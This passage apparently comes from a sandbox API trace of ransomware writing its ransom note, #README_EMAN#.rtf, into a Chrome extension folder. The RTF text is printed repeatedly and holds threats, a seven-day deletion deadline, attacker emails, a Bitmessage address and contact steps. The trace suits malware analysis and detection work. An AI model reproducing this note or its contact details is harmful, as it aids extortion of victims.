th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x06H\x06*\x06'\x06 ", lpUsedDefaultChar=0x0) returned 8717 [0291.182] WriteFile (in: hFile=0x2ec, lpBuffer=0x2364cd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2364cd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0291.183] CloseHandle (hObject=0x2ec) returned 1 [0291.184] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\#readme_eman#.rtf")) returned 0xffffffff [0291.184] GetLastError () returned 0x2 [0291.184] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0291.184] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.184] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.184] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2364cd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't 